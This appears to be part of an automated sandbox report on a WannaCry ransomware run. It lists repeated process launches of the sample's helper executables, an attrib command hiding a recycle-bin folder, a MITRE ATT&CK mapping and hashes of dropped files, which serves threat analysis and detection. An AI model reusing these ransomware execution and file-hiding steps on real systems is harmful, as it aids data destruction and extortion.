  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2908
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4872
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4192
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2152
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:548
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:412
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:1140
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:72
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2136
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3716
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2316
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2776
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2904
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:884
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:580
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:3748
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:740
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1808
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1644
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  PID:4500
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2612
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1228
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:392
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4176
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2540
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  PID:2836
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3756
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4360
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  PID:3100
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1088
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2188
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  PID:1032
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4496
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3112
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  PID:4560
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3996
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4400
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  PID:2184
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3512
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2468
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:2064
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3364
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3232
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1160
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:2952
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:456
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:2912
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4840
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4984
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:4620
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:5020
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1820
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:4560
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:404
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:1652
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2604
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4780
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4508
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:3520
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4584
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:2600
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4512
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:3364
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2236
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:3232
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:3972
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:4404
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:3448
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4008
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:3880
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:2860
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1328
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:1672
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1056
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:1740
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3580
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:2928
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2240
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2400
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2196
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:2632
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:2612
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:4176
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4480
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:4908
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1672
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3212
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:3468
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:2336
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4040
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4668
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:4840
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:3188
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:3020
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3672
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:3488
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4592
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4596
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:228
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:1652
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:1152
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:1176
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3716
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:3024
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:3976
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1924
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:2356
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2316
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3580
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1748
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:4904
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3448
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4008
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:4644
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:3588
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:1420
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  PID:3596
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:1544
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3852
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2632
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3040

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

Filesize
1KB

MD5
2d1ec540cc92a1fe13e270fbc9f1bcd0

SHA1
a8d72418e760e44e46afa3e98afda7ef90401f89

SHA256
8c28dc00779003f96c853890435a994f42cb9361949d60817c94f7cdc5da7976

SHA512
0d12cf48de6ed7ac261bc98b6e6168c9c903e406dd89ad0a8fb050ba4be7c207107bbf93f86f1aed075a45c5fd33aecca914cbd7793e393377204f5a0e0e76b6

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\9fdaf10b-f042-412c-8f4c-9e7d0201d9f5.tmp

Filesize
10KB

MD5
ad467ebcf485c54814ba0478353f9722

SHA1
ab8a14527c813cbf3016b6da692a8a0c8cda1286

SHA256
b92115473797a8018c9505832bae2d5595363f07b239db393f37e20c324af024

SHA512
92cb040336bf1a729eeaeb23f7caaf9fcb9fe3f83fede3f768f295dca4c1db99c1f0bef857c59a4f527a6960cf50bc8fc672d0d24751c368bc2c90961726a140

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
e2506c03b84ae5a5aa3749767320b40d

SHA1
112faa58df37635e4e6322f2edb44016bca3683a

SHA256
30115e5514c2a55e67ee519217826749ec7db19748a2091b32098c7e71aebdaa

SHA512
60490f3dd5fdf34fc107921256eec4f5a360443c80ad56ab90c2f0e733d20e1f644089022e2623562749a03d2c9eb917bf179a6469076b8c1bfaa8397c567b5e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
211KB

MD5
e7226392c938e4e604d2175eb9f43ca1

SHA1
2098293f39aa0bcdd62e718f9212d9062fa283ab

SHA256
d46ec08b6c29c4ca56cecbf73149cc66ebd902197590fe28cd65dad52a08c4e1

SHA512
63a4b99101c790d40a813db9e0d5fde21a64ccaf60a6009ead027920dbbdb52cc262af829e5c4140f3702a559c7ac46efa89622d76d45b4b49a9ce01625ef145

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002f

Filesize
17KB

MD5
ae5632b5a929f954315113dd2570dca5

SHA1
515d71e8f89847d16d0868d45bfb63911855b593

SHA256
6ea3b055101e7810a6ac655b54b1f9f5bcd4c34a4c751468e233226645f27e66

SHA512
e128614cdaf17bdff8d5561e8e25cfca989306f7c25623569244a9715577bba165e8c1dd3ca8256f8ec8e6c5284ff605455ecce4f4473f82ddc62e204b7df415

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000031

Filesize
25KB

MD5
18b6a8386bdec4fd0cfea62e37f5d6c7

SHA1
257bcbe2cbf0d995b51bf82acf4df3643bc97ee2

SHA256
afcb5c8dd069a570d8e54f5eb78fadb7bf2b4b0f72e2f78303a7c1e772e9ce99

SHA512
f0c0847458d195b4c6fd6474fae813330eb1a5e406aaa493f62012a6527e1ef3774e0a497ae033adbcc9675dd69b83e35790193a6b9fc5062b6a42d5fc0b9691

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
216B

MD5
db8c4447b8fafdbb28ac998be84e8043

SHA1
9aad9ed49f30287f15fa87be4446aee4855c95a5

SHA256
a7a7ba6e71b69073a1485208149eee12c694d47da2b3c6b05dbffec6fdc93e7a

SHA512
f66076d9210d202aea3c8020a5d1f5f35ef92d9652b5b5b032562ded5b8296790ff61300f7b4c5481715422ea722eac78a704b42a1555cbbb47786d1feb3f88c

Download Submit
